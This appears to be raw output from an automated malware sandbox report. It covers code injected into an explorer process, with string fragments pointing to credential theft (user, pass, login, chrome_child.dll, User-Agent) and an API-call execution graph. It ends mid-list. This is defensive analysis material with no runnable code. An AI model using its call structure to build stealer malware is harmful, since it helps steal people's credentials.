                                                                                                                • Instruction ID: 066a53cbef9426e18b2f725842e38d305ca5d049b3f8b2f34a5e37abb7f24ded
                                                                                                                • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                • Instruction Fuzzy Hash: FAC1C331A18B194FC758EF68D455AEAF3E1FB98300F81432E884AD7252DF34E646C785
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                • API String ID: 0-2058692283
                                                                                                                • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                • Instruction ID: 7a6b980b504b91cc24ba92bafa2452d7a9accb40caa6a60922f48d627f277943
                                                                                                                • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                • Instruction Fuzzy Hash: F2A19070A187488FDB19EFA8D4447EEB7E1FF88304F40462ED88AD7252EF7495458789
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                • API String ID: 0-2058692283
                                                                                                                • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                • Instruction ID: d904abcf9cf44b430cb333fdd311b2beaee582517c7d363a42ee16f49362239b
                                                                                                                • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                • Instruction Fuzzy Hash: 3C919F70A187488BDB19EFA8D444BEEB7F1FF88304F40462ED88AD7252EF7495458B85
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $.$e$n$v
                                                                                                                • API String ID: 0-1849617553
                                                                                                                • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                • Instruction ID: b22bddf50ebf13deb9cae13672ad8837ec780b101f473db7b8f00042be7541d2
                                                                                                                • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                • Instruction Fuzzy Hash: 62716371A187488FE754EF68C4847AAB7F1FF98304F00062FD84AD7262EF75A9458745
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                • API String ID: 0-1970020201
                                                                                                                • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                • Instruction ID: 0bec5a2846f11adbdb464173894b50c5fe40db205e63f79fac81adf0b11fbeeb
                                                                                                                • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                • Instruction Fuzzy Hash: 3E515DB0918B4C8BDB55EF64D045AEEB7F1FF58300F40462E989AE7214EF70A645CB89
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4$\$dll$ion.$vers
                                                                                                                • API String ID: 0-1610437797
                                                                                                                • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                • Instruction ID: 4aea1237a28d4d0c520be511d13770c58e414d64336c83ff71e4568e89724a1b
                                                                                                                • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                • Instruction Fuzzy Hash: AC417F3061CB888BDB69EF2498457EB77E4FB98305F40462E989EC7241EF34E645C782
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                • API String ID: 0-327345718
                                                                                                                • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                • Instruction ID: 547b6946e4ddbdcc171ec6fc706d975819cce04ac44f7f02fa482e7cea96e594
                                                                                                                • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                • Instruction Fuzzy Hash: 16415C31E18E0D8FDB58EF6880947AE73E2FB5C310F40016AAC0AD7351DA75D9858B86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .dll$el32$h$kern
                                                                                                                • API String ID: 0-4264704552
                                                                                                                • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                • Instruction ID: 3abd59ef496059d81402f8e85a5d4340c4361d4481e80edf9435d7f2b552baa3
                                                                                                                • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                • Instruction Fuzzy Hash: 844160B0A0CB488FD769DF2984843AAB7E1FB98301F504A6F989AC2666DB70D545CB41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $Snif$f fr$om:
                                                                                                                • API String ID: 0-3434893486
                                                                                                                • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                • Instruction ID: 665caa506bfb6f295856331ec24331cf8d8fe7b1b5f9a9aca74c26f94e5b606f
                                                                                                                • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                • Instruction Fuzzy Hash: 4E31F27150CB885FD71AEF29C0846EAB7D4FB94300F50491EE89BD7252EE34A64ACB43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $Snif$f fr$om:
                                                                                                                • API String ID: 0-3434893486
                                                                                                                • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                • Instruction ID: f13b6b8061d0ed128d4d0023cbbd2c65d0e6dd030e05022f69580e3ee69149f5
                                                                                                                • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                • Instruction Fuzzy Hash: 9931F471508B486FD719EF29C4846EAB7D4FB94300F40491FE89BD3252EE34E60ACA43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .dll$chro$hild$me_c
                                                                                                                • API String ID: 0-3136806129
                                                                                                                • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                • Instruction ID: 98aa9b03a7ae3cc28b7e4bacef2c83c9bb33de967bc76dc24603413a8befc5eb
                                                                                                                • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                • Instruction Fuzzy Hash: 2231A031518B184FC784EF698494BAAB7E1FF98300F84063E984ECB256DF34D545C782
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .dll$chro$hild$me_c
                                                                                                                • API String ID: 0-3136806129
                                                                                                                • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                • Instruction ID: af54cf73f950af587d5ba1af2b9a1dd697b2701b3272f92ed487ace287ef5f56
                                                                                                                • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                • Instruction Fuzzy Hash: EB31BE31618B184FC784EF698494BAAB7E1FF98300F84063E984ACB356CF34D545C782
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                • API String ID: 0-319646191
                                                                                                                • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                • Instruction ID: e0c3e62941fd10c44a8950488a67586bc74b5db6af998ad43b7bf9bc09284fea
                                                                                                                • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                • Instruction Fuzzy Hash: 6C31C071A14B0C8BDB04EFA9D8847EEBBE4FF58214F40022BD85EE7241DE789645C799
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                • API String ID: 0-319646191
                                                                                                                • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                • Instruction ID: 0a7acaf9da3e26e0285bdc8943b58d0e48300434b36e1c835849f67dbd400df2
                                                                                                                • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                • Instruction Fuzzy Hash: 3E21B170A14B0C8ADB05EFA9C8847EE7BE4FF58204F40421FD85AE7245DE7896458799
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .$l$l$t
                                                                                                                • API String ID: 0-168566397
                                                                                                                • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                • Instruction ID: 9bbd367919182e2afbb3ecdaf02ab4c703a0ccb17380c2a03aaa3f106c8ac65d
                                                                                                                • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                • Instruction Fuzzy Hash: 01217A70A24B0D9FEB08EFA9D0447AEBAF0FB58304F50462ED409E3601DB78A591CB84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .$l$l$t
                                                                                                                • API String ID: 0-168566397
                                                                                                                • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                • Instruction ID: 93a1509d1e6be762e1d106c09d60d3eb96612f26085fc40b2562946d436831e6
                                                                                                                • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                • Instruction Fuzzy Hash: 8C218B70A24B0D9BEB08EFA9D0447EEBBF0FB58304F50462ED409E3601DB78A591CB84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: auth$logi$pass$user
                                                                                                                • API String ID: 0-2393853802
                                                                                                                • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                • Instruction ID: 437595f37583a2048dc181580e00220ac010793d7f13a624a6f12487e608f8a0
                                                                                                                • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                • Instruction Fuzzy Hash: AD21AE30614B0D8BDB05DF9998806EEB7F1FF88344F00461A980AEB345D7B4E9148BC2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:1.7%
                                                                                                                Dynamic/Decrypted Code Coverage:2%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:593
                                                                                                                Total number of Limit Nodes:77
                                                                                                                execution_graph 98223 5942ad0 LdrInitializeThunk 98227 5059040 98230 505907b 98227->98230 98238 505bd00 98227->98238 98229 505915c 98230->98229 98241 504ace0 98230->98241 98234 50590e0 Sleep 98235 50590cd 98234->98235 98235->98229 98235->98234 98250 5058c60 LdrLoadDll 98235->98250 98251 5058e70 LdrLoadDll 98235->98251 98252 505a500 98238->98252 98240 505bd2d 98240->98230 98242 504ace3 98241->98242 98243 504ad0b 98242->98243 98244 504ad40 LdrLoadDll 98242->98244 98245 5054e40 98243->98245 98244->98243 98246 5054e5a 98245->98246 98247 5054e4e 98245->98247 98246->98235 98247->98246 98259 50552c0 LdrLoadDll 98247->98259 98249 5054fac 98249->98235 98250->98235 98251->98235 98255 505af20 98252->98255 98254 505a51c NtAllocateVirtualMemory 98254->98240 98256 505af30 98255->98256 98258 505af52 98255->98258 98257 5054e40 LdrLoadDll 98256->98257 98257->98258 98258->98254 98259->98249 98260 505f0fd 98263 505b990 98260->98263 98264 505b9b6 98263->98264 98271 5049d30 98264->98271 98266 505b9c2 98267 505b9e6 98266->98267 98279 5048f30 98266->98279 98317 505a670 98267->98317 98320 5049c80 98271->98320 98273 5049d3d 98274 5049d44 98273->98274 98332 5049c20 98273->98332 98274->98266 98280 5048f57 98279->98280 98730 504b1b0 98280->98730 98282 5048f69 98734 504af00 98282->98734 98284 5048f86 98289 5048f8d 98284->98289 98805 504ae30 LdrLoadDll 98284->98805 98287 5048ffc 98750 504f400 98287->98750 98313 50490f2 98289->98313 98738 504f370 98289->98738 98290 5049006 98291 505bf50 2 API calls 98290->98291 98290->98313 98292 504902a 98291->98292 98293 505bf50 2 API calls 98292->98293 98294 504903b 98293->98294 98295 505bf50 2 API calls 98294->98295 98296 504904c 98295->98296 98762 504ca80 98296->98762 98298 5049059 98299 5054a40 8 API calls 98298->98299 98300 5049066 98299->98300 98301 5054a40 8 API calls 98300->98301 98302 5049077 98301->98302 98303 5049084 98302->98303 98304 50490a5 98302->98304 98772 504d610 98303->98772 98306 5054a40 8 API calls 98304->98306 98312 50490c1 98306->98312 98308 50490e9 98310 5048d00 23 API calls 98308->98310 98310->98313 98311 5049092 98788 5048d00 98311->98788 98312->98308 98806 504d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98312->98806 98313->98267 98318 505af20 LdrLoadDll 98317->98318 98319 505a68f 98318->98319 98321 5049c93 98320->98321 98371 5058b80 LdrLoadDll 98320->98371 98351 5058a30 98321->98351 98324 5049c9c 98325 5049ca6 98324->98325 98354 505b270 98324->98354 98325->98273 98327 5049ce3 98327->98325 98365 5049aa0 98327->98365 98329 5049d03 98372 5049620 LdrLoadDll 98329->98372 98331 5049d15 98331->98273 98708 505b560 98332->98708 98335 505b560 LdrLoadDll 98336 5049c4b 98335->98336 98337 505b560 LdrLoadDll 98336->98337 98338 5049c61 98337->98338 98339 504f170 98338->98339 98340 504f189 98339->98340 98712 504b030 98340->98712 98342 504f19c 98716 505a1a0 98342->98716 98346 504f1ed 98348 505a450 2 API calls 98346->98348 98347 504f1c2 98347->98346 98722 505a220 98347->98722 98350 5049d55 98348->98350 98350->98266 98373 505a5c0 98351->98373 98355 505b289 98354->98355 98376 5054a40 98355->98376 98357 505b2a1 98358 505b2aa 98357->98358 98415 505b0b0 98357->98415 98358->98327 98360 505b2be 98360->98358 98433 5059ec0 98360->98433 98686 5047ea0 98365->98686 98367 5049ac1 98367->98329 98368 5049aba 98368->98367 98699 5048160 98368->98699 98371->98321 98372->98331 98374 505af20 LdrLoadDll 98373->98374 98375 5058a45 98374->98375 98375->98324 98377 5054d75 98376->98377 98387 5054a54 98376->98387 98377->98357 98380 5054b80 98445 505a320 98380->98445 98381 5054b63 98502 505a420 LdrLoadDll 98381->98502 98384 5054b6d 98384->98357 98385 5054ba7 98386 505bd80 2 API calls 98385->98386 98390 5054bb3 98386->98390 98387->98377 98441 5059c10 98387->98441 98388 5054d39 98391 505a450 2 API calls 98388->98391 98389 5054d4f 98511 5054780 LdrLoadDll NtReadFile NtClose 98389->98511 98390->98384 98390->98388 98390->98389 98395 5054c42 98390->98395 98392 5054d40 98391->98392 98392->98357 98394 5054d62 98394->98357 98396 5054ca9 98395->98396 98397 5054c51 98395->98397 98396->98388 98398 5054cbc 98396->98398 98400 5054c56 98397->98400 98401 5054c6a 98397->98401 98504 505a2a0 98398->98504 98503 5054640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98400->98503 98404 5054c87 98401->98404 98405 5054c6f 98401->98405 98404->98392 98460 5054400 98404->98460 98448 50546e0 98405->98448 98407 5054c60 98407->98357 98409 5054d1c 98508 505a450 98409->98508 98410 5054c7d 98410->98357 98413 5054c9f 98413->98357 98414 5054d28 98414->98357 98416 505b0c1 98415->98416 98417 505b0d3 98416->98417 98418 505bd00 2 API calls 98416->98418 98417->98360 98419 505b0f4 98418->98419 98530 5054060 98419->98530 98421 505b140 98421->98360 98422 505b117 98422->98421 98423 5054060 3 API calls 98422->98423 98426 505b139 98423->98426 98425 505b1ca 98428 505b1da 98425->98428 98657 505aec0 LdrLoadDll 98425->98657 98426->98421 98562 5055380 98426->98562 98572 505ad30 98428->98572 98430 505b208 98652 5059e80 98430->98652 98434 5059edc 98433->98434 98435 505af20 LdrLoadDll 98433->98435 98680 5942c0a 98434->98680 98435->98434 98436 5059ef7 98438 505bd80 98436->98438 98683 505a630 98438->98683 98440 505b319 98440->98327 98442 5059c1c 98441->98442 98443 505af20 LdrLoadDll 98442->98443 98444 5054b34 98443->98444 98444->98380 98444->98381 98444->98384 98446 505a33c NtCreateFile 98445->98446 98447 505af20 LdrLoadDll 98445->98447 98446->98385 98447->98446 98449 50546fc 98448->98449 98450 505a2a0 LdrLoadDll 98449->98450 98451 505471d 98450->98451 98452 5054724 98451->98452 98453 5054738 98451->98453 98454 505a450 2 API calls 98452->98454 98455 505a450 2 API calls 98453->98455 98456 505472d 98454->98456 98457 5054741 98455->98457 98456->98410 98512 505bf90 LdrLoadDll RtlAllocateHeap 98457->98512 98459 505474c 98459->98410 98461 505447e 98460->98461 98462 505444b 98460->98462 98463 50545c9 98461->98463 98467 505449a 98461->98467 98464 505a2a0 LdrLoadDll 98462->98464 98465 505a2a0 LdrLoadDll 98463->98465 98466 5054466 98464->98466 98472 50545e4 98465->98472 98468 505a450 2 API calls 98466->98468 98469 505a2a0 LdrLoadDll 98467->98469 98470 505446f 98468->98470 98471 50544b5 98469->98471 98470->98413 98474 50544d1 98471->98474 98475 50544bc 98471->98475 98525 505a2e0 LdrLoadDll 98472->98525 98478 50544d6 98474->98478 98482 50544ec 98474->98482 98477 505a450 2 API calls 98475->98477 98476 505461e 98479 505a450 2 API calls 98476->98479 98480 50544c5 98477->98480 98481 505a450 2 API calls 98478->98481 98483 5054629 98479->98483 98480->98413 98484 50544df 98481->98484 98485 50544f1 98482->98485 98513 505bf50 98482->98513 98483->98413 98484->98413 98495 5054503 98485->98495 98516 505a3d0 98485->98516 98488 5054557 98489 505456e 98488->98489 98524 505a260 LdrLoadDll 98488->98524 98491 5054575 98489->98491 98492 505458a 98489->98492 98494 505a450 2 API calls 98491->98494 98493 505a450 2 API calls 98492->98493 98496 5054593 98493->98496 98494->98495 98495->98413 98497 50545bf 98496->98497 98519 505bb50 98496->98519 98497->98413 98499 50545aa 98500 505bd80 2 API calls 98499->98500 98501 50545b3 98500->98501 98501->98413 98502->98384 98503->98407 98505 5054d04 98504->98505 98506 505af20 LdrLoadDll 98504->98506 98507 505a2e0 LdrLoadDll 98505->98507 98506->98505 98507->98409 98509 505a46c NtClose 98508->98509 98510 505af20 LdrLoadDll 98508->98510 98509->98414 98510->98509 98511->98394 98512->98459 98526 505a5f0 98513->98526 98515 505bf68 98515->98485 98517 505af20 LdrLoadDll 98516->98517 98518 505a3ec NtReadFile 98517->98518 98518->98488 98520 505bb74 98519->98520 98521 505bb5d 98519->98521 98520->98499 98521->98520 98522 505bf50 2 API calls 98521->98522 98523 505bb8b 98522->98523 98523->98499 98524->98489 98525->98476 98527 505a605 98526->98527 98528 505af20 LdrLoadDll 98527->98528 98529 505a60c RtlAllocateHeap 98528->98529 98529->98515 98531 5054071 98530->98531 98532 5054079 98530->98532 98531->98422 98533 505434c 98532->98533 98658 505cef0 98532->98658 98533->98422 98535 50540cd 98536 505cef0 2 API calls 98535->98536 98540 50540d8 98536->98540 98537 5054126 98539 505cef0 2 API calls 98537->98539 98543 505413a 98539->98543 98540->98537 98541 505d020 3 API calls 98540->98541 98672 505cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 98540->98672 98541->98540 98542 5054197 98544 505cef0 2 API calls 98542->98544 98543->98542 98663 505d020 98543->98663 98545 50541ad 98544->98545 98547 50541ea 98545->98547 98549 505d020 3 API calls 98545->98549 98548 505cef0 2 API calls 98547->98548 98550 50541f5 98548->98550 98549->98545 98551 505d020 3 API calls 98550->98551 98557 505422f 98550->98557 98551->98550 98554 505cf50 2 API calls 98555 505432e 98554->98555 98556 505cf50 2 API calls 98555->98556 98558 5054338 98556->98558 98669 505cf50 98557->98669 98559 505cf50 2 API calls 98558->98559 98560 5054342 98559->98560 98561 505cf50 2 API calls 98560->98561 98561->98533 98563 5055391 98562->98563 98564 5054a40 8 API calls 98563->98564 98566 50553a7 98564->98566 98565 50553fa 98565->98425 98566->98565 98567 50553f5 98566->98567 98568 50553e2 98566->98568 98570 505bd80 2 API calls 98567->98570 98569 505bd80 2 API calls 98568->98569 98571 50553e7 98569->98571 98570->98565 98571->98425 98573 505ad3d 98572->98573 98673 505abf0 98573->98673 98576 505abf0 LdrLoadDll 98577 505ad4d 98576->98577 98578 505abf0 LdrLoadDll 98577->98578 98579 505ad56 98578->98579 98580 505abf0 LdrLoadDll 98579->98580 98581 505ad5f 98580->98581 98582 505abf0 LdrLoadDll 98581->98582 98583 505ad68 98582->98583 98584 505abf0 LdrLoadDll 98583->98584 98585 505ad71 98584->98585 98586 505abf0 LdrLoadDll 98585->98586 98587 505ad7d 98586->98587 98588 505abf0 LdrLoadDll 98587->98588 98589 505ad86 98588->98589 98590 505abf0 LdrLoadDll 98589->98590 98591 505ad8f 98590->98591 98592 505abf0 LdrLoadDll 98591->98592 98593 505ad98 98592->98593 98594 505abf0 LdrLoadDll 98593->98594 98595 505ada1 98594->98595 98596 505abf0 LdrLoadDll 98595->98596 98597 505adaa 98596->98597 98598 505abf0 LdrLoadDll 98597->98598 98599 505adb6 98598->98599 98600 505abf0 LdrLoadDll 98599->98600 98601 505adbf 98600->98601 98602 505abf0 LdrLoadDll 98601->98602 98603 505adc8 98602->98603 98604 505abf0 LdrLoadDll 98603->98604 98605 505add1 98604->98605 98606 505abf0 LdrLoadDll 98605->98606 98607 505adda 98606->98607 98608 505abf0 LdrLoadDll 98607->98608 98609 505ade3 98608->98609 98610 505abf0 LdrLoadDll 98609->98610 98611 505adef 98610->98611 98612 505abf0 LdrLoadDll 98611->98612 98613 505adf8 98612->98613 98614 505abf0 LdrLoadDll 98613->98614 98615 505ae01 98614->98615 98616 505abf0 LdrLoadDll 98615->98616 98617 505ae0a 98616->98617 98618 505abf0 LdrLoadDll 98617->98618 98619 505ae13 98618->98619 98620 505abf0 LdrLoadDll 98619->98620 98621 505ae1c 98620->98621 98622 505abf0 LdrLoadDll 98621->98622 98623 505ae28 98622->98623 98624 505abf0 LdrLoadDll 98623->98624 98625 505ae31 98624->98625 98626 505abf0 LdrLoadDll 98625->98626 98627 505ae3a 98626->98627 98628 505abf0 LdrLoadDll 98627->98628 98629 505ae43 98628->98629 98630 505abf0 LdrLoadDll 98629->98630 98631 505ae4c 98630->98631 98632 505abf0 LdrLoadDll 98631->98632 98633 505ae55 98632->98633 98634 505abf0 LdrLoadDll 98633->98634 98635 505ae61 98634->98635 98636 505abf0 LdrLoadDll 98635->98636 98637 505ae6a 98636->98637 98638 505abf0 LdrLoadDll 98637->98638 98639 505ae73 98638->98639 98640 505abf0 LdrLoadDll 98639->98640 98641 505ae7c 98640->98641 98642 505abf0 LdrLoadDll 98641->98642 98643 505ae85 98642->98643 98644 505abf0 LdrLoadDll 98643->98644 98645 505ae8e 98644->98645 98646 505abf0 LdrLoadDll 98645->98646 98647 505ae9a 98646->98647 98648 505abf0 LdrLoadDll 98647->98648 98649 505aea3 98648->98649 98650 